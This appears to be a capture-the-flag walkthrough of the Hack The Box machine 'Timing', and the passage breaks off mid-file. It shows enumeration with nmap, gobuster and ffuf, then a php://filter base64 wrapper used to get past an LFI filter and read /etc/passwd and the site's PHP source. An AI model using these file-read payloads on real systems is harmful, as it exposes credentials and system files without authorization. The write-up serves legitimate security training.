Hack-The-Box-walkthrough[timing]

Introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 11 Dec 2021
IP: 10.10.11.135


Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.135
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap reveals two open ports, HTTP and SSH. Let’s look at the web page.

Just a login page, there’s nothing else on the homepage. Let’s do a directory brute force.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# gobuster dir -u http://timing.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://timing.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/18 08:46:39 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 275]
/images (Status: 301) [Size: 309] [--> http://timing.htb/images/]
/.html.php (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/login.php (Status: 200) [Size: 5609]
/index.php (Status: 302) [Size: 0] [--> ./login.php]
/js (Status: 301) [Size: 305] [--> http://timing.htb/js/]
/css (Status: 301) [Size: 306] [--> http://timing.htb/css/]
/.htm.php (Status: 403) [Size: 275]
/.htm (Status: 403) [Size: 275]
/profile.php (Status: 302) [Size: 0] [--> ./login.php]
/logout.php (Status: 302) [Size: 0] [--> ./login.php]
/image.php (Status: 200) [Size: 0]
/upload.php (Status: 302) [Size: 0] [--> ./login.php]
/header.php (Status: 302) [Size: 0] [--> ./login.php]
/footer.php (Status: 200) [Size: 3937]
/. (Status: 302) [Size: 0] [--> ./login.php]

We got a couple of directories and PHP files. Looking closer, most of the PHP files redirect to ‘login.php’. However, image.php does not redirect anywhere, and its size is ‘0’. Initially I was a little confused about why there is both an ‘image.php’ and an ‘images’ directory, as both seem to serve the same purpose. So I did a directory brute force on ‘images’.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# gobuster dir -u http://timing.htb/images/ -x php -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://timing.htb/images/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/18 08:50:11 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 275]
/.html.php (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/.htm (Status: 403) [Size: 275]
/.htm.php (Status: 403) [Size: 275]
/uploads (Status: 301) [Size: 317] [--> http://timing.htb/images/uploads/]

There’s another directory inside ‘images’. My speculation was that if a user uploads an image via ‘upload.php’, it is dumped in the ‘/images/uploads’ directory and can be accessed via ‘image.php’. I tried fuzzing a ‘file’ parameter for LFI or path traversal.

┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -u 'http://timing.htb/image.php?file=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt


v1.1.0-git
________________________________________________

:: Method : GET
:: URL : http://timing.htb/image.php?file=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________

/etc/httpd/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/lilo.conf [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/exports [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/shadow [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/anacrontab [Status: 200, Size: 0, Words: 1, Lines: 1]
/etc/groups [Status: 200, Size: 0, Words: 1, Lines: 1]
......

As you can see, the status code is 200 for every file but the size is 0. This simply means the ‘file’ parameter is not being used. I tried a couple of other parameters and all failed, but the ‘img’ parameter worked.

┌──(root💀kali)-[~/ffuf]
└─# ./ffuf -u 'http://timing.htb/image.php?img=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt


v1.1.0-git
________________________________________________

:: Method : GET
:: URL : http://timing.htb/image.php?img=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________

/etc/lighttpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/passwd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/shadow [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftpaccess [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/inetd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts.deny [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/issue [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftphosts [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/exports [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/chrootUsers [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/chttp.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cups/cupsd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/crontab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/aliases [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/groups [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/at.deny [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cron.allow [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/apache2/apache2.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/fstab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/conf/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/at.allow [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/inittab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/bootptab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/hosts.allow [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/cron.deny [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/proftpd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/vsftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/motd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/lsb-release [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/mtab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/my.cnf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/my.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/mysql/my.cnf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/networks [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/network/interfaces [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/passwd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php5/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/proftp.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ftpchroot [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/srm.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pureftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/pure-ftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd/putreftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/resolv.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/samba/smb.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_config [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/anacrontab [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_dsa_key [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_dsa_key.pub [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/syslog.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/termcap [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd.chroot_list [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/lilo.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/apache2/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/logrotate.d/ftp [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/motd [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftpaccess [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4.4/fcgi/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftphosts [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/wu-ftpd/ftpusers [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/cgi/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/pure-ftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/npasswd [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/security_debug_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/logs/security_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/opt/lampp/etc/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/interrupts [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/cpuinfo [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/filesystems [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pureftpd.passwd [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/meminfo [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/ioports [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/cgi/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php5/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php4/apache/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/apache2/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/snmpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/mounts [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/version [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/self/net/arp [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/stat [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/sshd_config [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/lib/php/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/conf/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_key.pub [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/printcap [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/profile [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/sysconfig/network [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/audit_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/httpd/access.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/redhat-release [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vsftpd/vsftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/license_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/ssh/ssh_host_key [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/httpd/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/login_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/stats_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/grub.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/bashrc [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/vhcs2/proftpd/proftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/httpd.conf.php [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/httpd.conf.php [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/httpd.conf.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/etc/pureftpd.pdn [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/www/logs/httpd_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/modules.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/sbin/pure-config.pl [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/adm/log/xferlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache2/config.inc [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/lib/mysql/my.cnf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/apache/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/local/www/conf/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/lib/mysql/mysql/user.MYD [Status: 200, Size: 25, Words: 3, Lines: 1]
/opt/xampp/etc/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/modules [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/php/php4/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/root/anaconda-ks.cfg [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/etc/proftpd/proftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/proc/swaps [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache-ssl/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache-ssl/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/auth.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/boot [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/htmp [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/chttp.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/conf/modsec.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/cups/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/daemon.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/dmesg [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/dpkg.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim/mainlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_mainlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_paniclog [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/httpd/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim.paniclog [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/pureftpd.pdb [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/etc/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/apache/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim_rejectlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/exim/rejectlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/faillog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftplog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftp-proxy [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/cpanel/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/ftp-proxy/ftp-proxy.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpsd/ssl.access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpd/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/kern.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/httpsd/ssl_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lastlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/lighttpd.access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/lighttpd.error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mail.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/maillog [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mail.warn [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/message [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysqlderror.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/messages [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql-bin.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/apache2/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php5/httpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/php4/lib/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/secure [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/vsftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/pure-ftpd/pure-ftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/cpanel/cpanel.config [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/etc/pure-ftpd.conf [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/wtmp [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/xferlog [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/Zend/etc/php.ini [Status: 200, Size: 25, Words: 3, Lines: 1]
/usr/local/pureftpd/sbin/pure-config.pl [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/mysql.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/spool/cron/crontabs/root [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/webmin/miniserv.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/run/utmp [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/log/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/error_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/log/access_log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/www/logs/error.log [Status: 200, Size: 25, Words: 3, Lines: 1]
~/.atfp_history [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_history [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_logout [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bash_profile [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.login [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.bashrc [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.gtkrc [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.logout [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.php_history [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.mysql_history [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.nano_history [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.profile [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/debug [Status: 200, Size: 25, Words: 3, Lines: 1]
~/.ssh/id_dsa.pub [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_dsa [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/authorized_keys [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_rsa [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/id_rsa.pub [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/identity [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.ssh/identity.pub [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.viminfo [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.wm_style [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.Xdefaults [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.Xresources [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.xsession [Status: 200, Size: 0, Words: 1, Lines: 1]
~/.xinitrc [Status: 200, Size: 0, Words: 1, Lines: 1]
/var/log/mail.info [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql-slow.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/pureftpd.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/lighttpd/access.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/yum.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/proftpd [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql.log [Status: 200, Size: 25, Words: 3, Lines: 1]
/var/log/mysql/mysql.log [Status: 200, Size: 25, Words: 3, Lines: 1]
:: Progress: [257/257] :: Job [1/1] :: 42 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

We got a 200 status code and the same size for every file, which suggests the response is a fixed message rather than the file contents.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=/etc/passwd'
Hacking attempt detected!

As you can see, I tried to curl the path with the ‘img’ parameter and got the above response. We need to bypass the security filter now.

  • Wrapper php://filter

We will use:

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

this PHP filter wrapper to bypass the filter and read files. It returns the output base64-encoded, so we need to decode it to read it.

We got the encoded information, let’s decode it.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd' | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2152 100 2152 0 0 2744 0 --:--:-- --:--:-- --:--:-- 2741
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

We can decode it directly and grep for user details. We found the user ‘aaron’. Now we can read the local files we found in our initial directory brute force.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=upload.php' | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1360 100 1360 0 0 1730 0 --:--:-- --:--:-- --:--:-- 1728
<?php
include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

if (empty($error)) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file has been uploaded.";
    } else {
        echo "Error: There was an error uploading your file.";
    }
} else {
    echo "Error: " . $error;
}
?>

‘upload.php’ gives us another piece of information, but it is only useful if we have access to the upload functionality. There is an authentication check file; let’s look at it first.

┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php' | base64 -d
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 268 100 268 0 0 379 0 --:--:-- --:--:-- --:--:-- 379
<?php

include_once "auth_check.php";

if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
